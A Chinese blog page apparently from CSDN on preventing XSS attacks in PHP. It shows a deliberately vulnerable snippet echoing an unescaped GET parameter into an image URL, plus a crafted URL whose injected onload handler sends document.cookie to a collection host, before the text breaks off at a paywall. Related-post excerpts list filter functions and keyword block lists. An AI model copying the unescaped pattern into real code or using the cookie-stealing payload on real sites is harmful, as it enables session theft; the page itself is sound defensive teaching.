PHP XSS攻击防范--如何过滤用户输入

最新推荐文章于 2024-04-24 05:00:00 发布
最新推荐文章于 2024-04-24 05:00:00 发布
阅读量4.9k 收藏 3
点赞数 1
分类专栏: PHP 运维经验 文章标签: php xss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/loophome/article/details/53896012
版权

一、什么是XSS攻击

XSS攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。

来看一个简单的例子: 
<?php
$slogan_type = isset($_GET['slogan_type']) ? $_GET['slogan_type'] : 'default';
?>
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>37游戏,玩心创造世界_37网页游戏平台</title>
<meta name="keywords" content="37游戏,三七玩,网页游戏平台,37.com,网页游戏" />
</head>

<body>
    <div><img src="http://img1.37wanimg.com/slogan/<?php echo $slogan_type; ?>.png"/> </div>
</body>

</html>


当攻击者A伪造网页的url:http://demo.37.com/test.php?slogan_type=%22%20οnlοad=%22javascript:this.scr=%27http://127.0.0.1/test.php?c=%27%20+%20document.cookie%22%
最低0.47元/天 解锁文章
loophome
关注
专栏目录
xss php 转义_整理php防注入和XSS攻击通用过滤
weixin_39963523的博客
03-09 463
对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips1. 假定所...
XSS-SQL-Master-Payloads:我的有效载荷集合(XSS,SQL ...)
05-01
首先,XSS攻击是指攻击者通过在网页中插入恶意脚本,使得当用户访问该页面时,这些脚本会在用户的浏览器中执行,从而达到窃取用户信息、操纵用户行为等目的。XSS分为三种类型:存储型XSS、反射型XSS和DOM型XSS。攻击...
php过滤XSS攻击的函数
01-20
下面的函数可以用来过滤用户输入,保证输入XSS安全的。具体如何过滤,可以参看函数内部,也有注释。复制代码 代码如下:<?phpfunction RemoveXSS($val) {     // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed     // this prevents some character re-spacing such as <java>     // note that you have to handle splits with \n, \
php 避免xss_php如何防范xss
weixin_39611037的博客
03-09 172
XSS攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。php防范xss的方法有在输出html时,加上Content Security Policy的Http Header;在设置Cookie时,加上Htt...
php如何防止xss攻击
XJ58678的博客
08-05 355
php防止xss跨站脚本攻击的方法,是针对非法的html代码包括单双引号,使用htmlspecialchar()函数。 在使用htmlspecialchar()的时候注意第二个参数,直接用htmlspecialchar($string)的话,第二个参数默认是ENT_COMPAT,函数只是转义双引号,不转义单引号。 所以使用htmlspecialchar函数时尽量加上第二个参数,htm...
php 字符串截取.支持中文和其他编码,,检查字符串是否是UTF8编码
weixin_33834910的博客
08-29 163
为什么80%的码农都做不了架构师?>>> ...
Yii2的XSS攻击防范策略分析
10-21
XSS攻击防范策略是当下网络安全中的一个重要课题,而Yii2作为一款高性能的PHP框架,其内建的防范机制对于Web应用的安全起到了关键的作用。本文将详细分析Yii2框架中防止XSS攻击的策略,并探讨其原理与实施方法。 ...
PHPXSS跨站攻击的防范
10-30
在实际应用中,许多PHP网站由于未正确处理用户输入的数据而容易受到XSS攻击。例如,Discuz论坛系统曾曝出XSS漏洞,攻击者可以通过特定的输入数据在论坛页面中注入恶意脚本。此类攻击往往利用了开发者未能对用户提交...
ThinkPHP2.x防范XSS跨站攻击的方法
12-19
- 在开发过程中,所有从用户输入获取的数据都应该被视为不可信,必须进行适当的过滤、转义或验证。 - 使用预编译语句或者参数绑定来防止SQL注入。 - 对敏感操作进行CSRF(Cross-Site Request Forgery)防护,比如...
PHP防范XSS攻击
IT部落格
03-03 2824
定义 XSS(Cross Site Scripting)攻击,中文名为跨站脚本攻击,是一种常见的网页攻击方式。 攻击者在web页面中插入一些恶意的javascript或HTML代码,当用户浏览该页面的时候,嵌入到web页面中的javascript/HTML代码会被执行,从而达到攻击目的。 一个简单的例子就是网页中的评论功能,用户编写一段javascript代码(见下面)提交到服务器,如果不做过滤就直接显示出来的话,就会导致用户一打开页面就会有弹窗提示“你被攻击了”。 <script>window
PHP 安全:如何防止PHP中的XSS
最新发布
新华编程特战队
04-24 1222
跨站点脚本(XSS) 是一种严重的安全漏洞,允许恶意行为者将恶意脚本引入网站,使毫无戒心的访问者处于危险之中。使用 XSS,攻击者可以在受害者的 Web 浏览器中执行任意代码,可能导致敏感数据被盗、未经授权的访问或网站污损。本文旨在深入探讨 XSS 攻击的主要形式,阐明其根本原因,探索 XSS 利用的潜在后果,并深入了解防止 PHPXSS 攻击的有效措施。当恶意行为者成功将有害脚本插入受信任的网站时,就会发生跨站脚本(XSS) 攻击。这些受感染的网站在不知不觉中将注入的脚本提供给毫无戒心的用户
PHP 防止xss攻击
infinite
01-20 539
一、什么是xss攻击?   XSS攻击全称跨站脚本攻击,是为不合层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSSXSS是一种在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。    XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中...
php防止xss攻击
u013695932的博客
05-09 317
<?PHP function clean_xss(&$string, $low = False) { if (!is_array($string)) { $string = trim($string); $string = strip_tags($string); $string = htmlspecialchars($string); if ($low) { return True; ...
PHP防止xss攻击
yang_ldgd的博客
08-16 621
phpxss攻击
php+xss防范,php如何防范xss-php教程
weixin_29825861的博客
03-20 211
php防备xss的办法有正在输入html时,加之Content Security Policy的Http Header;正在设置Cookie时,加之HttpOnly参数;测验申请的Referer参数php防备xss一、PHP间接输入html的,能够采纳如下的办法进行过滤:htmlspecialchars函数htmlentities函数HTMLPurifier.auto.php插件RemoveXss...
php防止xss攻击和sql注入
dw5235的博客
04-08 1252
1、防止xss攻击 1、开启COOKIE_HTTPONLY = true ;//tp3.2 2、default_filter:设置为htmlspecialchars 百度官方方法: 和SQL注入防御一样,XSS攻击也是利用了Web页面的编写疏忽,所以还有一种方法就是从Web应用开发的角度来避免: 步骤1、对所有用户提交内容进行可靠的输入验证,包括对URL、查询关键字、HTTP头、P...
php XSS安全过滤测试代码
qq_42078965的博客
07-19 384
<?PHP function remove_xss($val) { // remove all non-printable characters. CR(0a) and LF(0b) and TAB(9) are allowed // this prevents some character re-spacing such as <java\0script> // note that you have to handle splits with \n, \r, and
php防止xss攻击以及sql注入
zhumengstyle的博客
12-17 706
function SafeFilter (&amp;amp;$arr) { $ra=Array('/([\x00-\x08,\x0b-\x0c,\x0e-\x19])/','/select/','/from/','/update/','/delete/','/drop/','/alter/','/script/','/javascript/','/vbscript/','/expression/'...
php防注入和XSS攻击通用过滤
prefertea的博客
10-15 855
对网站发动XSS攻击的方式有很多种,仅仅使用php的一些内置过滤函数是对付不了的,即使你将filter_var,mysql_real_escape_string,htmlentities,htmlspecialchars,strip_tags这些函数都使用上了也不一定能保证绝对的安全。 那么如何预防 XSS 注入?主要还是需要在用户数据过滤方面得考虑周全,在这里不完全总结下几个 Tips 假定...
防范PHP攻击:SQL注入与XSS防护策略
XSS攻击是利用用户在网页上输入的脚本代码执行未经授权的操作。为了防止XSS攻击,开发人员应: - **过滤用户输入**:在输出任何用户提交的数据之前,应对其进行适当的清理和验证。例如,使用`htmlspecialchars()`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值